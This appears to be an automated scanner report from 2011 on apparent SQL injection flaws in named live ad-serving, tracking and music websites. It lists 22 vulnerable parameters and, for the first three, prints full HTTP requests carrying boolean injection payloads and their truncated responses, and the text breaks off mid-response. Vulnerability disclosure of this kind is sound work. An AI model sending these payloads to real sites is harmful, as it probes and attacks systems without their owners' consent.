SQL Injection, DORK, Report, Example, PoC, March 19, 2011

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by XSS.CX at Sat Mar 19 09:55:48 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.


1. SQL injection

1.1. http://1c6e9.v.fwmrm.net/ad/g/1 [_cph cookie]

1.2. http://1c6e9.v.fwmrm.net/ad/g/1 [flag parameter]

1.3. http://1c6e9.v.fwmrm.net/ad/g/1 [sfid parameter]

1.4. http://bestbuyon.com/listing/all [name of an arbitrarily supplied request parameter]

1.5. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

1.6. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

1.7. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

1.8. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

1.9. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

1.10. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

1.11. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

1.12. http://wd.sharethis.com/api/getApi.php [name of an arbitrarily supplied request parameter]

1.13. http://wd.sharethis.com/api/getApi.php [publisher parameter]

1.14. http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector.asp [Referer HTTP header]

1.15. http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector.asp [User-Agent HTTP header]

1.16. http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector.asp [rotationId parameter]

1.17. http://www.ultimate-guitar.com/about/job.htm [REST URL parameter 2]

1.18. http://www.ultimate-guitar.com/bands/t.htm [REST URL parameter 2]

1.19. http://www.ultimate-guitar.com/modules/rss/all_updates.xml.php [name of an arbitrarily supplied request parameter]

1.20. http://www.ultimate-guitar.com/search/suggest.php [REST URL parameter 2]

1.21. http://www.ultimate-guitar.com/xtra/click_contest.php [User-Agent HTTP header]

1.22. http://www.ultimate-guitar.com/xtra/click_contest.php [name of an arbitrarily supplied request parameter]



1. SQL injection
There are 22 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://1c6e9.v.fwmrm.net/ad/g/1 [_cph cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://1c6e9.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The _cph cookie appears to be vulnerable to SQL injection attacks. The payloads 17292965'%20or%201%3d1--%20 and 17292965'%20or%201%3d2--%20 were each submitted in the _cph cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=74316&ssnw=&csid=FSL_films&sfid=&cdid=&pvrn=y789t005dy&vprn=&vip=173.193.214.243&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3310;;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=728x90slot&envp=g_js&w=728&h=90&lo=&flag=+cmpn;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=160x600slot&envp=g_js&w=160&h=600&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e9.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.foxsearchlight.com/insider/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="c007_5577003974315604268"; _auv="g158249~1.1299939850.5,14576.1299939850.5,^"; _vr="1299939837..333670~333678~343034~345187~359443~366038~,"; _cph="1299938380.273.1.1,1299937795.439.1.1,"17292965'%20or%201%3d1--%20; _sc="sg158249.1299937795.1299939858.28800.1250.156,"; _wr="g158249"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3745525d5f4f58455e445a4a423208

Response 1

HTTP/1.1 200 OK
Set-Cookie: _sid="c006_5585802266361004873";domain=.fwmrm.net;path=/;
Set-Cookie: _uid="c007_5577003974315604268";expires=Sun, 18 Mar 2012 14:45:37 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="";expires=Mon, 18 Apr 2011 14:45:37 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1300545937.y789t005dy.266627~266628~,1300545928.8x3q1dfpr5.266627~266628~,1300545398.y789t005dyb8d9be6c550f47ce9a53dc03.266627~266628~,1300545397.b8d9be6cb0a7dc9508a95061.266627~266628~,";expires=Mon, 18 Apr 2011 14:45:37 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg146942.1300545937.1300545937.28800.0.0,";expires=Mon, 18 Apr 2011 14:45:37 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g146942";expires=Mon, 18 Apr 2011 14:45:37 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Pragma: no-cache
Vary: Accept-Encoding
Date: Sat, 19 Mar 2011 14:45:37 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3545525d5f4f58455e445a4a423208;path=/;httponly
Content-Length: 15849

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ads[0]._.ad;
           for (var a=0; a<ads.length; a++) {
               var ad = ads[a];
               for (var c=0; c<ad._.creatives[0]._.creative.length; c++) {
                   var creative = ad._.creatives[0]._.creative[c];
                   for (var r=0; r<creative._.creativeRenditions[0]._.creativeRendition.length; r++) {
                       var creativeRendition = creative._.creativeRenditions[0]._.creativeRendition[r];
                       for (var s=0; s<creativeRendition._.asset.length; s++) {
                           var asset = creativeRendition._.asset[s];
                           var content = asset._.content[0]._;
                           var contentType = asset.contentType;
                           crs['_'+creativeRendition.creativeRenditionId] = content;
                       }
                   }
               }
           }
           if (window.console) console.log("RE
...[SNIP]...

Request 2

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=74316&ssnw=&csid=FSL_films&sfid=&cdid=&pvrn=y789t005dy&vprn=&vip=173.193.214.243&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3310;;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=728x90slot&envp=g_js&w=728&h=90&lo=&flag=+cmpn;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=160x600slot&envp=g_js&w=160&h=600&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e9.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.foxsearchlight.com/insider/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="c007_5577003974315604268"; _auv="g158249~1.1299939850.5,14576.1299939850.5,^"; _vr="1299939837..333670~333678~343034~345187~359443~366038~,"; _cph="1299938380.273.1.1,1299937795.439.1.1,"17292965'%20or%201%3d2--%20; _sc="sg158249.1299937795.1299939858.28800.1250.156,"; _wr="g158249"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3745525d5f4f58455e445a4a423208

Response 2

HTTP/1.1 200 OK
Set-Cookie: _sid="c102_5585802270656011575";domain=.fwmrm.net;path=/;
Set-Cookie: _auv="";expires=Mon, 18 Apr 2011 14:45:38 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1300545938.y789t005dy.266627~266628~,1300545924.8x3q1dfpr5.266627~266628~,1300545398.y789t005dyb8d9be6c550f47ce9a53dc03.266627~266628~,1300545397.b8d9be6cb0a7dc9508a95061.266627~266628~,";expires=Mon, 18 Apr 2011 14:45:38 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg146942.1300545938.1300545938.28800.0.0,";expires=Mon, 18 Apr 2011 14:45:38 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g146942";expires=Mon, 18 Apr 2011 14:45:38 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Pragma: no-cache
Vary: Accept-Encoding
Date: Sat, 19 Mar 2011 14:45:37 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3145525d5f4f58455e445a4a423209;path=/;httponly
Content-Length: 15849

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ads[0]._.ad;
           for (var a=0; a<ads.length; a++) {
               var ad = ads[a];
               for (var c=0; c<ad._.creatives[0]._.creative.length; c++) {
                   var creative = ad._.creatives[0]._.creative[c];
                   for (var r=0; r<creative._.creativeRenditions[0]._.creativeRendition.length; r++) {
                       var creativeRendition = creative._.creativeRenditions[0]._.creativeRendition[r];
                       for (var s=0; s<creativeRendition._.asset.length; s++) {
                           var asset = creativeRendition._.asset[s];
                           var content = asset._.content[0]._;
                           var contentType = asset.contentType;
                           crs['_'+creativeRendition.creativeRenditionId] = content;
                       }
                   }
               }
           }
           if (window.console) console.log("RENDITIONS", crs);
           var cnt=0;
           for (var s=0; s<resp.siteSection[0]._.adSlots[0]._.adSlot.length; s++) {
       
...[SNIP]...

1.2. http://1c6e9.v.fwmrm.net/ad/g/1 [flag parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://1c6e9.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The flag parameter appears to be vulnerable to SQL injection attacks. The payloads 13903592'%20or%201%3d1--%20 and 13903592'%20or%201%3d2--%20 were each submitted in the flag parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=74316&ssnw=&csid=FSL_films&sfid=&cdid=&pvrn=8x3q1dfpr5&vprn=&vip=173.193.214.243&vdur=&flag=-unka13903592'%20or%201%3d1--%20&resp=smrx&crtp=ptiling&vclr=JS-pt-r3310;;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=728x90slot&envp=g_js&w=728&h=90&lo=&flag=+cmpn;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=160x600slot&envp=g_js&w=160&h=600&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e9.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.foxsearchlight.com/insider/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1299939837..333670~333678~343034~345187~359443~366038~,"; _cph="1299938380.273.1.1,1299937795.439.1.1,"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3745525d5f4f58455e445a4a423208; _sid="b008_5585799869769638198"; _uid="c007_5577003974315604268"; _auv="g146942~5.1300545381.0,20486.1300545381.0,^"; _pr="1300545380.y789t005dy.266627~266628~,"; _sc="sg146942.1300545379.1300545381.28800.0.0,"; _wr="g146942"

Response 1

HTTP/1.1 200 OK
Set-Cookie: _uid="c007_5577003974315604268";expires=Sun, 18 Mar 2012 14:41:34 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g146942~5.1300545381.0,20486.1300545381.0,^";expires=Mon, 18 Apr 2011 14:41:34 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1300545680.y789t005dy.266627~266628~,1300545413.8x3q1dfpr5.266627~266628~,1300545398.y789t005dyb8d9be6c550f47ce9a53dc03.266627~266628~,1300545397.b8d9be6cb0a7dc9508a95061.266627~266628~,";expires=Mon, 18 Apr 2011 14:41:34 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg146942.1300545379.1300545694.28800.0.0,";expires=Mon, 18 Apr 2011 14:41:34 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g146942";expires=Mon, 18 Apr 2011 14:41:34 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Pragma: no-cache
Vary: Accept-Encoding
Date: Sat, 19 Mar 2011 14:41:34 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3445525d5f4f58455e445a4a423208;path=/;httponly
Content-Length: 4756

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ads[0]._.ad;
           for (var a=0; a<ads.length; a++) {
               var ad = ads[a];
               for (var c=0; c<ad._.creatives[0]._.creative.length; c++) {
                   var creative = ad._.creatives[0]._.creative[c];
                   for (var r=0; r<creative._.creativeRenditions[0]._.creativeRendition.length; r++) {
                       var creativeRendition = creative._.creativeRenditions[0]._.creativeRendition[r];
                       for (var s=0; s<creativeRendition._.asset.length; s++) {
                           var asset = creativeRendition._.asset[s];
                           var content = asset._.content[0]._;
                           var contentType = asset.contentType;
                           crs['_'+creativeRendition.creativeRenditionId] = content;
                       }
                   }
               }
           }
           if (window.console) console.log("RENDITIONS", crs);
           var cnt=0
...[SNIP]...

Request 2

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=74316&ssnw=&csid=FSL_films&sfid=&cdid=&pvrn=8x3q1dfpr5&vprn=&vip=173.193.214.243&vdur=&flag=-unka13903592'%20or%201%3d2--%20&resp=smrx&crtp=ptiling&vclr=JS-pt-r3310;;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=728x90slot&envp=g_js&w=728&h=90&lo=&flag=+cmpn;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=160x600slot&envp=g_js&w=160&h=600&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e9.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.foxsearchlight.com/insider/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1299939837..333670~333678~343034~345187~359443~366038~,"; _cph="1299938380.273.1.1,1299937795.439.1.1,"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3745525d5f4f58455e445a4a423208; _sid="b008_5585799869769638198"; _uid="c007_5577003974315604268"; _auv="g146942~5.1300545381.0,20486.1300545381.0,^"; _pr="1300545380.y789t005dy.266627~266628~,"; _sc="sg146942.1300545379.1300545381.28800.0.0,"; _wr="g146942"

Response 2

HTTP/1.1 200 OK
Set-Cookie: _auv="g146942~5.1300545381.0,20486.1300545381.0,^";expires=Mon, 18 Apr 2011 14:41:35 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1300545680.8x3q1dfpr5.266627~266628~,1300545412.y789t005dy.266627~266628~,1300545398.y789t005dyb8d9be6c550f47ce9a53dc03.266627~266628~,1300545397.b8d9be6cb0a7dc9508a95061.266627~266628~,";expires=Mon, 18 Apr 2011 14:41:35 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg146942.1300545379.1300545695.28800.0.0,";expires=Mon, 18 Apr 2011 14:41:35 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Pragma: no-cache
Vary: Accept-Encoding
Date: Sat, 19 Mar 2011 14:41:35 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c0e45525d5f4f58455e445a4a423208;path=/;httponly
Content-Length: 4756

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ads[0]._.ad;
           for (var a=0; a<ads.length; a++) {
               var ad = ads[a];
               for (var c=0; c<ad._.creatives[0]._.creative.length; c++) {
                   var creative = ad._.creatives[0]._.creative[c];
                   for (var r=0; r<creative._.creativeRenditions[0]._.creativeRendition.length; r++) {
                       var creativeRendition = creative._.creativeRenditions[0]._.creativeRendition[r];
                       for (var s=0; s<creativeRendition._.asset.length; s++) {
                           var asset = creativeRendition._.asset[s];
                           var content = asset._.content[0]._;
                           var contentType = asset.contentType;
                           crs['_'+creativeRendition.creativeRenditionId] = content;
                       }
                   }
               }
           }
           if (window.console) console.log("RENDITIONS", crs);
           var cnt=0;
           for (var s=0; s<resp.siteSection[0]._.adSlots[0]._.adSlot.length; s++) {
               var slot = resp.siteSection[0]._.adSlots[0]._.adSlot[s];
               for (var a=0; a<slot._.selectedAds[0]._.adReference.lengt
...[SNIP]...

1.3. http://1c6e9.v.fwmrm.net/ad/g/1 [sfid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://1c6e9.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The sfid parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sfid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=74316&ssnw=&csid=FSL_films&sfid='%20and%201%3d1--%20&cdid=&pvrn=y789t005dy&vprn=&vip=173.193.214.243&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3310;;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=728x90slot&envp=g_js&w=728&h=90&lo=&flag=+cmpn;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=160x600slot&envp=g_js&w=160&h=600&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e9.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.foxsearchlight.com/insider/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="c007_5577003974315604268"; _auv="g158249~1.1299939850.5,14576.1299939850.5,^"; _vr="1299939837..333670~333678~343034~345187~359443~366038~,"; _cph="1299938380.273.1.1,1299937795.439.1.1,"; _sc="sg158249.1299937795.1299939858.28800.1250.156,"; _wr="g158249"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3745525d5f4f58455e445a4a423208

Response 1

HTTP/1.1 200 OK
Set-Cookie: _sid="b008_5585800818957611742";domain=.fwmrm.net;path=/;
Set-Cookie: _uid="c007_5577003974315604268";expires=Sun, 18 Mar 2012 14:40:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="";expires=Mon, 18 Apr 2011 14:40:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1300545600.8x3q1dfpr5.266627~266628~,1300545431.8x3q1dfpr5b8d9be6c5fc709fa0bdd09be.266627~266628~,1300545430.b8d9be6c40ff0c356d873f2c.266627~266628~,1300545398.y789t005dyb8d9be6c550f47ce9a53dc03.266627~266628~,1300545397.b8d9be6cb0a7dc9508a95061.266627~266628~,";expires=Mon, 18 Apr 2011 14:40:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg146942.1300545600.1300545600.28800.0.0,";expires=Mon, 18 Apr 2011 14:40:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g146942";expires=Mon, 18 Apr 2011 14:40:00 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Pragma: no-cache
Vary: Accept-Encoding
Date: Sat, 19 Mar 2011 14:40:00 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Content-Length: 15856

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
[
{_:{
"error":[
{id:"25", name:"INVALID_ASSET_ID", severity:"WARN", _:{
"context":[
{_:"-1"
}]}
}]}
}],
"visitor":[
{_:null
}],
"ads":[
{_:{
"ad":[
{adId:"266627", adUnit:"20486", _:{
"creatives":[
{_:{
"creative":[
{adUnit:"fixed-size-interactive", baseUnit:"fixed-size-interactive", creativeId:"118523", duration:"30", _:{
"creativeRenditions":[
{_:{
"creativeRendition":[
{adReplicaId:"0", creativeApi:"None", creativeRenditionId:"137315", height:"90", preference:"0", width:"728", _:{
"asset":[
{bytes:"3264", contentType:"text/html_lit_js_wc_nw", id:"133329", mimeType:"text/html", name:"external url/tag for Default asset package of - 1", _:{
"content":[
{_:"<span style=\"display:inline-block; vertical-align:top; margin:0px 0px 0px 0px;\"><iframe id=\"_fw_frame_728x90slot\" width=\"728\" height=\"90\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" scrolling=\"no\" ALLOWTRANSPARENCY=\"true\"><\/iframe>\n<script language=\"javascript\" type=\"text/javascript\" id=\"_fw_container_js_728x90slot\">//<!-- \n (function(){\n var fw_scope_window = window;\n var fw_scope = document;\n var fw_content = \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\">\\n<html>\\n<head>\\n\\t<title>Advertisement<\/title>\\n\\t<scr\" + \"ipt type=\\\"text/javascr\" + \"ipt\\\">window._fw_page_url = \\\"http://www.foxsearchlight.com/insider/\\\";<\/scr\" + \"ipt>\\n<\/head>\\n<body style=\\\"margin:0px;background-color:transparent;\\\"><scr\" + \"ipt type=\\\"text/javascr\" + \"ipt\\\"><!--\\ngoogle_ad_client = \\\"pub-2846859707368523\\\";\\n/* 728x90, created 10/22/08 */\\ngoogle_ad_slot = \\\"0266362223\\\";\\ngoogle_ad_width = 728;\\ngoogle_ad_height = 90;\\n//-->\\n<\/scr\" + \"ipt>\\n<scr\" + \"ipt type=\\\"text/javascr\" + \"ipt\\\"\\nsrc=\\\"http://pagead2.googlesyndication.com/pagead/show_ads.js\\\">\\n<\/scr\" + \"ipt><\/body>\\n<\/html>\";\n var targetFrame = fw_scope.getElementById(\"_fw_frame_728x90slot\");\n v
...[SNIP]...

Request 2

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=74316&ssnw=&csid=FSL_films&sfid='%20and%201%3d2--%20&cdid=&pvrn=y789t005dy&vprn=&vip=173.193.214.243&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3310;;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=728x90slot&envp=g_js&w=728&h=90&lo=&flag=+cmpn;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=160x600slot&envp=g_js&w=160&h=600&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e9.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.foxsearchlight.com/insider/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="c007_5577003974315604268"; _auv="g158249~1.1299939850.5,14576.1299939850.5,^"; _vr="1299939837..333670~333678~343034~345187~359443~366038~,"; _cph="1299938380.273.1.1,1299937795.439.1.1,"; _sc="sg158249.1299937795.1299939858.28800.1250.156,"; _wr="g158249"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3745525d5f4f58455e445a4a423208

Response 2

HTTP/1.1 200 OK
Set-Cookie: _sid="b008_5585800827546714523";domain=.fwmrm.net;path=/;
Set-Cookie: _uid="c007_5577003974315604268";expires=Sun, 18 Mar 2012 14:40:02 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="";expires=Mon, 18 Apr 2011 14:40:02 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1300545602.y789t005dy.266627~266628~,1300545601.8x3q1dfpr5.266627~266628~,1300545431.8x3q1dfpr5b8d9be6c5fc709fa0bdd09be.266627~266628~,1300545430.b8d9be6c40ff0c356d873f2c.266627~266628~,1300545398.y789t005dyb8d9be6c550f47ce9a53dc03.266627~266628~,1300545397.b8d9be6cb0a7dc9508a95061.266627~266628~,";expires=Mon, 18 Apr 2011 14:40:02 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg146942.1300545602.1300545602.28800.0.0,";expires=Mon, 18 Apr 2011 14:40:02 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g146942";expires=Mon, 18 Apr 2011 14:40:02 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Pragma: no-cache
Vary: Accept-Encoding
Date: Sat, 19 Mar 2011 14:40:01 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Content-Length: 15842

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
[
{_:{
"error":[
{id:"25", name:"INVALID_ASSET_ID", severity:"WARN", _:{
"context":[
{_:"-1"
}]}
}]}
}],
"visitor":[
{_:null
}],
"ads":[
{_:{
"ad":[
{adId:"266628", adUnit:"20489", _:{
"creatives":[
{_:{
"creative":[
{adUnit:"fixed-size-interactive", baseUnit:"fixed-size-interactive", creativeId:"118522", duration:"30", _:{
"creativeRenditions":[
{_:{
"creativeRendition":[
{adReplicaId:"0", creativeApi:"None", creativeRenditionId:"137314", height:"600", preference:"0", width:"160", _:{
"asset":[
{bytes:"3273", contentType:"text/html_lit_js_wc_nw", id:"133328", mimeType:"text/html", name:"external url/tag for Default asset package of - 1", _:{
"content":[
{_:"<span style=\"display:inline-block; vertical-align:top; margin:0px 0px 0px 0px;\"><iframe id=\"_fw_frame_160x600slot\" width=\"160\" height=\"600\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" scrolling=\"no\" ALLOWTRANSPARENCY=\"true\"><\/iframe>\n<script language=\"javascript\" type=\"text/javascript\" id=\"_fw_container_js_160x600slot\">//<!-- \n (function(){\n var fw_scope_window = window;\n var fw_scope = document;\n var fw_content = \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\">\\n<html>\\n<head>\\n\\t<title>Advertisement<\/title>\\n\\t<scr\" + \"ipt type=\\\"text/javascr\" + \"ipt\\\">window._fw_page_url = \\\"http://www.foxsearchlight.com/insider/\\\";<\/scr\" + \"ipt>\\n<\/head>\\n<body style=\\\"margin:0px;background-color:transparent;\\\"><scr\" + \"ipt type=\\\"text/javascr\" + \"ipt\\\"><!--\\ngoogle_ad_client = \\\"pub-2846859707368523\\\";\\n/* 160x600, created 10/22/08 */\\ngoogle_ad_slot = \\\"2309176492\\\";\\ngoogle_ad_width = 160;\\ngoogle_ad_height = 600;\\n//-->\\n<\/scr\" + 